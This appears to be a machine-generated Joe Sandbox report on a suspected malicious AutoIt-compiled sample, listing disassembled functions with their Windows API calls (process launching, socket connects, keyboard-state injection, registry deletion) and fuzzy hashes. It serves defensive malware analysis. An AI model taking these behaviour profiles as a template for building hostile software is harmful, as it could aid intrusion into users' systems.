                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                            • _wcstok.LIBCMT ref: 00F4EC94
                                                                                                                            • _wcscpy.LIBCMT ref: 00F4ED23
                                                                                                                            • _memset.LIBCMT ref: 00F4ED56
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                            • String ID: X
                                                                                                                            • API String ID: 774024439-3081909835
                                                                                                                            • Opcode ID: 0d443d17ee54083f13a3012e9cd5b30fa353a0e3e4dc525f1d132b1d5245d9ef
                                                                                                                            • Instruction ID: d2fa9533e9c5ba579f2d42a80a4bff66a0d95c9b0e63fce09e7c93b484b3dfb1
                                                                                                                            • Opcode Fuzzy Hash: 0d443d17ee54083f13a3012e9cd5b30fa353a0e3e4dc525f1d132b1d5245d9ef
                                                                                                                            • Instruction Fuzzy Hash: A9C1A1719083459FC754EF24C881A5ABBE4FF85324F10492DFD9AAB2A2DB30EC45DB42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 713adbb93dab77a3f627e126444cf7cf336c9ad4bfd9086fc216e7475ae549f1
                                                                                                                            • Instruction ID: 0c7ae4907b8b82c45a5464b01918f11271924c1895220d37f0363f3896e029aa
                                                                                                                            • Opcode Fuzzy Hash: 713adbb93dab77a3f627e126444cf7cf336c9ad4bfd9086fc216e7475ae549f1
                                                                                                                            • Instruction Fuzzy Hash: EA716D3090015DEFCB148F99CC48EFEBB75FF85324F148199F925AA291D730AA91DB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1c2545d38c3857882cd0f6f405edea4139bcf9662d3409bf452c886b3517a2d3
                                                                                                                            • Instruction ID: 5c687ea087f93ccd4f71bec22afd58d8f83200d8434c2fe43304f016cd5e6441
                                                                                                                            • Opcode Fuzzy Hash: 1c2545d38c3857882cd0f6f405edea4139bcf9662d3409bf452c886b3517a2d3
                                                                                                                            • Instruction Fuzzy Hash: 8561A072608344ABC710EB25DC81F6FB7F8AF84724F504928FA65A72A2DB709D09D752
                                                                                                                            APIs
                                                                                                                            • IsWindow.USER32(01205408), ref: 00F6B3EB
                                                                                                                            • IsWindowEnabled.USER32(01205408), ref: 00F6B3F7
                                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F6B4DB
                                                                                                                            • SendMessageW.USER32(01205408,000000B0,?,?), ref: 00F6B512
                                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00F6B54F
                                                                                                                            • GetWindowLongW.USER32(01205408,000000EC), ref: 00F6B571
                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F6B589
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4072528602-0
                                                                                                                            • Opcode ID: 55aeb66516c00524e01766c6e6412d2dad25fbe28dbdadf7931e6e6b902ea604
                                                                                                                            • Instruction ID: b85b22a4742cbb63dc5abb0a9963fd30bd61a838b3f94685b5fd9ac41194a84f
                                                                                                                            • Opcode Fuzzy Hash: 55aeb66516c00524e01766c6e6412d2dad25fbe28dbdadf7931e6e6b902ea604
                                                                                                                            • Instruction Fuzzy Hash: 8C718074A04204AFDB20DF54C895FBA7BB5EF0A320F144159E956D7362CB72AD81EB50
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F5F448
                                                                                                                            • _memset.LIBCMT ref: 00F5F511
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00F5F556
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00F5F5CD
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F5F5FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3522835683-2766056989
                                                                                                                            • Opcode ID: c02db7dc7cd9c31eed15fc999dd26c64d06d8801716a87ff27beebcd6c8be292
                                                                                                                            • Instruction ID: 8dee85835aef3cffcaeb6663b593d05cc8a97c8f3d78350e3d9552a38e3d9c26
                                                                                                                            • Opcode Fuzzy Hash: c02db7dc7cd9c31eed15fc999dd26c64d06d8801716a87ff27beebcd6c8be292
                                                                                                                            • Instruction Fuzzy Hash: C961B075A006199FCF04EF65C8819AEBBF5FF48320F1480A9E955BB361CB30AD49DB94
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00F40F8C
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40FA1
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F41002
                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F41030
                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F4104F
                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F41095
                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F410B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: 205f0e62a905321c796a216c4520b35bab4833edcb0e2ec5b7f1ccc1563a1db0
                                                                                                                            • Instruction ID: 154c8930cff958a9b5189940cc5e0a7710e7352e4449b7455c08cf6f91741605
                                                                                                                            • Opcode Fuzzy Hash: 205f0e62a905321c796a216c4520b35bab4833edcb0e2ec5b7f1ccc1563a1db0
                                                                                                                            • Instruction Fuzzy Hash: BE51E4609047D53DFB3643388C05BB6BFA96B06324F088589EAD5868D3D6E9DCC8F751
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(00000000), ref: 00F40DA5
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40DBA
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F40E1B
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F40E47
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F40E64
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F40EA8
                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F40EC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: d705bca4460591bbea47646ef3cf108bf99cb4e61a328b288e104e583470140e
                                                                                                                            • Instruction ID: 240523e13bb48f8c56b4935040b9687c18760ddd02274ac0722bbd6c6475977a
                                                                                                                            • Opcode Fuzzy Hash: d705bca4460591bbea47646ef3cf108bf99cb4e61a328b288e104e583470140e
                                                                                                                            • Instruction Fuzzy Hash: 7F51F8A0D447D53DFB3243748C45B7A7EA96B06320F084899EAD4864C2DBB5EC98F750
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsncpy$LocalTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2945705084-0
                                                                                                                            • Opcode ID: ea800d9cb14511c0d3228e13db89258a03563080249e059a86f75303e8112cb4
                                                                                                                            • Instruction ID: 38630d633c04fde2e3a14d30b9f217dbf0c8b4a8737eefa2388b54527ea9ec95
                                                                                                                            • Opcode Fuzzy Hash: ea800d9cb14511c0d3228e13db89258a03563080249e059a86f75303e8112cb4
                                                                                                                            • Instruction Fuzzy Hash: 9E41C7A5C10218B6CB51FBB48C469CFB7BC9F04310F504466E905E3162EB38B345E7E6
APIs
  • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F43697,?), ref: 00F4468B
  • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F43697,?), ref: 00F446A4
• lstrcmpiW.KERNEL32(?,?), ref: 00F436B7
• _wcscmp.LIBCMT ref: 00F436D3
• MoveFileW.KERNEL32(?,?), ref: 00F436EB
• _wcscat.LIBCMT ref: 00F43733
• SHFileOperationW.SHELL32(?), ref: 00F4379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: a9d5d1f320ed291d658468473f269e9fb38f0c05e219c45bcfeb61c5136b3a72
• Instruction ID: 3945d01e81ae53a2095c7585f4f517f92f9efbd5f42824672c0fbf7ec59575e6
• Opcode Fuzzy Hash: a9d5d1f320ed291d658468473f269e9fb38f0c05e219c45bcfeb61c5136b3a72
• Instruction Fuzzy Hash: 4741A57150C349AEC751EF64D845ADF7BE8AF89390F00082EF899C3251EA38D689D752
APIs
• _memset.LIBCMT ref: 00F672AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F67351
• IsMenu.USER32(?), ref: 00F67369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F673B1
• DrawMenuBar.USER32 ref: 00F673C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 222f47549b4f493ef51e528813e09da358cb2bd33445c92de97e78bc976981d1
• Instruction ID: 7f6c947cce89e7659750787b5ae42a048991ec6f86d1497f8521fc54947f3ab4
• Opcode Fuzzy Hash: 222f47549b4f493ef51e528813e09da358cb2bd33445c92de97e78bc976981d1
• Instruction Fuzzy Hash: 28412675A04308AFDB20EF50D886A9ABBF8FB05324F149529FD15A7350D730AD54EF60
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F60FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F60FFE
• FreeLibrary.KERNEL32(00000000), ref: 00F610B5
  • Part of subcall function 00F60FA5: RegCloseKey.ADVAPI32(?), ref: 00F6101B
  • Part of subcall function 00F60FA5: FreeLibrary.KERNEL32(?), ref: 00F6106D
  • Part of subcall function 00F60FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F61090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00F61058
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: dec304bc4d7bf4c2b989618e2b151f4a70cc14fc498ec8677a88359000c255ff
• Instruction ID: 3d0164ec31a33ddc128bcc1a5d6bc184c5afc53e4fcc5445ff076d33db05d5cf
• Opcode Fuzzy Hash: dec304bc4d7bf4c2b989618e2b151f4a70cc14fc498ec8677a88359000c255ff
• Instruction Fuzzy Hash: 22312D71D00109BFDF15DF90EC89EFFB7BCEF08310F140169E512A2141EA749E89AAA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F662EC
• GetWindowLongW.USER32(01205408,000000F0), ref: 00F6631F
• GetWindowLongW.USER32(01205408,000000F0), ref: 00F66354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F66386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F663B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00F663C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F663DB
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 54c937cf760c538a0dd244ca6248bd7114bb5dc97713833a303a598a80538706
• Instruction ID: 170c8cd4fc10b53107cd6a176d218a0033f499e093e3792706f7ebcc4dd2ec73
• Opcode Fuzzy Hash: 54c937cf760c538a0dd244ca6248bd7114bb5dc97713833a303a598a80538706
• Instruction Fuzzy Hash: 3631E231A44154AFEB20CF18EC86F5937E1FB4AB24F1901A4F525DF3B2CB72A844AB51
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DB2E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DB54
• SysAllocString.OLEAUT32(00000000), ref: 00F3DB57
• SysAllocString.OLEAUT32(?), ref: 00F3DB75
• SysFreeString.OLEAUT32(?), ref: 00F3DB7E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F3DBA3
• SysAllocString.OLEAUT32(?), ref: 00F3DBB1
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: e058d1808e32302172377df3974a0e7628a83ff74e5921d25045bb5aee5b4e62
• Instruction ID: 78274c87d763e96762d127bda4f14671b15f823c1d7c05c437c410458211b4cf
• Opcode Fuzzy Hash: e058d1808e32302172377df3974a0e7628a83ff74e5921d25045bb5aee5b4e62
• Instruction Fuzzy Hash: 96217F76A05219AFDB10DFA8EC88DBBB3ACEB49370B018565FD14DB290DB709C45A760
APIs
  • Part of subcall function 00F57D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F57DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F561C6
• WSAGetLastError.WSOCK32(00000000), ref: 00F561D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F5620E
• connect.WSOCK32(00000000,?,00000010), ref: 00F56217
• WSAGetLastError.WSOCK32 ref: 00F56221
• closesocket.WSOCK32(00000000), ref: 00F5624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F56263
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 83daf8e14055678d9c96c4640bde41573f05c46022657e3eb3ed5568fbe5712b
• Instruction ID: e46bce4cadbe274884d2871cc5c779a20d1e240703e208a707454dd0cb90a60b
• Opcode Fuzzy Hash: 83daf8e14055678d9c96c4640bde41573f05c46022657e3eb3ed5568fbe5712b
• Instruction Fuzzy Hash: C531A171600208AFDF10AF24DC85BBE7BE8EB45721F444069FE15E7291CB74AC08ABA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 37e39bb0a0630671092cc841cedd2b193270bbb7595189db3975d8cd93bef8ce
• Instruction ID: b980defd52a5d1f4d7c97d6bfade6764ffdc5c2ec6a789cc8b8148280377f33d
• Opcode Fuzzy Hash: 37e39bb0a0630671092cc841cedd2b193270bbb7595189db3975d8cd93bef8ce
• Instruction Fuzzy Hash: A1214672E1461266D330AA34EC03FBB73D8EF55370F54403AF846D6091EB559E4AF296
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DC2F
• SysAllocString.OLEAUT32(00000000), ref: 00F3DC32
• SysAllocString.OLEAUT32 ref: 00F3DC53
• SysFreeString.OLEAUT32 ref: 00F3DC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F3DC76
• SysAllocString.OLEAUT32(?), ref: 00F3DC84
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761583154-0
                                                                                                                            • Opcode ID: ac23ea024a710f7cbb75e812dfa7cc5bcb9e508f150533455daf6f4395de1214
                                                                                                                            • Instruction ID: 4672bbb850b7fdbd7ea74906f7565d27bb6d9af638e8f18e63e1829c29cd0839
                                                                                                                            • Opcode Fuzzy Hash: ac23ea024a710f7cbb75e812dfa7cc5bcb9e508f150533455daf6f4395de1214
                                                                                                                            • Instruction Fuzzy Hash: D0213036614208AFDB10DBB8EC88DAB77ECEB09370B108125F914CB2A1DAB4DC45E764

APIs
  • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
  • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
